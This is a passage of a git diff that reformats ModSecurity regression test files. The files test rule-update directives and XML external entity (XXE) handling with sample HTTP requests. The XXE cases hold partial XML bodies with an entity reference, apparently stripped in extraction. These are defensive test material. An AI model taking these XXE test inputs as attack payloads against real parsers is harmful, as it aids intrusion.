"client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateActionById (6/n)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"application/lhebs", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "application/lhebs", + "Expect": "100-continue" }, - "uri":"/a=urlencoded?param1=value1", - "method":"GET" + "uri": "/a=urlencoded?param1=value1", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code": 302, - "error_log": "Access denied with code 302" + "expected": { + "error_log": "Access denied with code 302", + "http_code": 302 }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateActionById 200004 \"redirect:'https://%{request_headers.host}/'\"", - "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block,deny\"" + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateActionById 200004 \"redirect:'https://%{request_headers.host}/'\"", + "SecRule ARGS \"@contains value1\" \"phase:3,id:200004,block,deny\"" ] } ] - diff --git a/test/test-cases/regression/config-update-target-by-id.json b/test/test-cases/regression/config-update-target-by-id.json index 8faecaefe6..78d694ff17 100644 --- a/test/test-cases/regression/config-update-target-by-id.json +++ b/test/test-cases/regression/config-update-target-by-id.json @@ -1,199 +1,214 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetById - exclude whole collection", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetById - exclude whole collection", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetById 1 !ARGS", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetById - exclude using regex", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetById - exclude using regex", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?mixpanel=value&mixpanel=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?mixpanel=value&mixpanel=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetById 1 !ARGS:/mixpanel$/", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetById - exclude using full name", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetById - exclude using full name", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?mixpanel=value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?mixpanel=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetById 1 !ARGS:mixpanel", "SecRule ARGS \"@contains value\" \"id:1,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetById - exclude from ARGS_NAMES using regex (match)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetById - exclude from ARGS_NAMES using regex (match)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?xxxyyy=value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?xxxyyy=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetById 1 \"!ARGS:/xxx/\"", "SecRule ARGS_NAMES \"@contains yyy\" \"id:1,phase:2,deny,status:403\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetById - exclude from ARGS_NAMES using regex (no match)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetById - exclude from ARGS_NAMES using regex (no match)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?xxyyy=value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?xxyyy=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetById 1 \"!ARGS:/xxx/\"", "SecRule ARGS_NAMES \"@contains yyy\" \"id:1,phase:2,deny,status:403\"" diff --git a/test/test-cases/regression/config-update-target-by-msg.json b/test/test-cases/regression/config-update-target-by-msg.json index 24fe343cd0..3cbf24568c 100644 --- a/test/test-cases/regression/config-update-target-by-msg.json +++ b/test/test-cases/regression/config-update-target-by-msg.json @@ -1,39 +1,42 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetByMsg test !ARGS", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,msg:'test',deny\"" diff --git a/test/test-cases/regression/config-update-target-by-tag.json b/test/test-cases/regression/config-update-target-by-tag.json index 10d4c1b487..0ba5d96f4e 100644 --- a/test/test-cases/regression/config-update-target-by-tag.json +++ b/test/test-cases/regression/config-update-target-by-tag.json @@ -1,282 +1,303 @@ [ { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag (1/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag (1/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetByTag test !ARGS", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag (2/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag (2/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetByTag test !ARGS:'/.*y$/'", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag (3/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag (3/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetByTag test !ARGS:'/k.*/'", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag (4/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag (4/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value&key=other_value", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?key=value&key=other_value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRuleUpdateTargetByTag test !ARGS:/ke/", "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag Test (5/6) Regex with match anchored at beginning of Subject", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&ref=something", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 200 - }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateTargetByTag test !ARGS:'/(?!ref)/'", - "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" - ] + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag Test (5/6) Regex with match anchored at beginning of Subject", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" + }, + "uri": "/?key=value&ref=something", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" + }, + "body": [ + "no need." + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateTargetByTag test !ARGS:'/(?!ref)/'", + "SecRule ARGS \"@contains value\" \"id:1,pass,t:trim,tag:'test',deny\"" + ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag Test (6/6) Regex with match anchored at beginning of Subject", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&ref=something", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 200 - }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateTargetByTag test !ARGS:'/^ref/'", - "SecRule ARGS \"@contains something\" \"id:1,pass,t:trim,tag:'test',deny\"" - ] + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag Test (6/6) Regex with match anchored at beginning of Subject", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" + }, + "uri": "/?key=value&ref=something", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" + }, + "body": [ + "no need." + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateTargetByTag test !ARGS:'/^ref/'", + "SecRule ARGS \"@contains something\" \"id:1,pass,t:trim,tag:'test',deny\"" + ] }, { - "enabled":1, - "version_min":300000, - "title":"SecRuleUpdateTargetByTag Test (7/6) Exclusion by full name", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" - }, - "uri":"/?key=value&ref=something", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 200 - }, - "rules":[ - "SecRuleEngine On", - "SecRuleUpdateTargetByTag test !ARGS:ref", - "SecRule ARGS \"@contains something\" \"id:1,pass,t:trim,tag:'test',deny\"" - ] + "enabled": 1, + "version_min": 300000, + "title": "SecRuleUpdateTargetByTag Test (7/6) Exclusion by full name", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" + }, + "uri": "/?key=value&ref=something", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" + }, + "body": [ + "no need." + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRuleUpdateTargetByTag test !ARGS:ref", + "SecRule ARGS \"@contains something\" \"id:1,pass,t:trim,tag:'test',deny\"" + ] } ] diff --git a/test/test-cases/regression/config-xml_external_entity.json b/test/test-cases/regression/config-xml_external_entity.json index 1f5cf098dc..0059b41b00 100644 --- a/test/test-cases/regression/config-xml_external_entity.json +++ b/test/test-cases/regression/config-xml_external_entity.json @@ -1,26 +1,27 @@ [ { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing SecXMLExternalEntity/XXE 1", - "expected":{ - "debug_log": "Target value: \" jo smith\"" + "enabled": 1, + "version_min": 300000, + "title": "Testing SecXMLExternalEntity/XXE 1", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", " &js;", "" ] + }, + "response": { + "headers": { + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Target value: \" jo smith\"", + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecXMLExternalEntity Off", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book[text()] \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecXMLExternalEntity Off", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book[text()] \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass\"" ] }, { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing SecXMLExternalEntity/XXE 2", - "expected":{ - "debug_log": "XML: Failed to load DTD: test-cases/data/SoapEnvelope.dtd", - "http_code": 403 + "enabled": 1, + "version_min": 300000, + "title": "Testing SecXMLExternalEntity/XXE 2", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", " &js;", "" ] + }, + "response": { + "headers": { + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "XML: Failed to load DTD: test-cases/data/SoapEnvelope.dtd", + "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecXMLExternalEntity Off", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"", - "SecRule XML \"@validateDTD test-cases/data/SoapEnvelope.dtd\" \"id:500007,phase:3,deny\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecXMLExternalEntity Off", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"", + "SecRule XML \"@validateDTD test-cases/data/SoapEnvelope.dtd\" \"id:500007,phase:3,deny\"" ] }, { - "enabled":1, - "version_min":300000, - "resource":"libxml2", - "title":"Testing SecXMLExternalEntity/XXE 3", - "expected":{ - "debug_log": "XML Error: No declaration for element bookstore", - "http_code": 403 + "enabled": 1, + "version_min": 300000, + "title": "Testing SecXMLExternalEntity/XXE 3", + "resource": "libxml2", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/?key=value&key=other_value", - "method":"POST", + "uri": "/?key=value&key=other_value", + "method": "POST", "body": [ "", " &js;", "" ] + }, + "response": { + "headers": { + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "XML Error: No declaration for element bookstore", + "http_code": 403 }, - "rules":[ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecXMLExternalEntity On", - "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", - "SecRule XML:/bookstore/book \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"", - "SecRule XML \"@validateDTD test-cases/data/SoapEnvelope.dtd\" \"id:500007,phase:3,deny\"" + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecXMLExternalEntity On", + "SecRule REQUEST_HEADERS:Content-Type \"^text/xml$\" \"id:500005,phase:1,t:none,t:lowercase,nolog,pass,ctl:requestBodyProcessor=XML\"", + "SecRule XML:/bookstore/book \".*\" \"id:500006,phase:3,t:none,t:lowercase,nolog,pass,xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/'\"", + "SecRule XML \"@validateDTD test-cases/data/SoapEnvelope.dtd\" \"id:500007,phase:3,deny\"" ] } ] - diff --git a/test/test-cases/regression/debug_log.json b/test/test-cases/regression/debug_log.json index 9e17fac69e..a0d4e119f6 100644 --- a/test/test-cases/regression/debug_log.json +++ b/test/test-cases/regression/debug_log.json @@ -15,8 +15,8 @@ "request": { "headers": { "Host": "net.tutsplus.com", - "User-Agent": "Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -26,31 +26,32 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?param1=test¶2=test2", + "uri": "/test.pl?param1=test¶2=test2", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" }, "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - 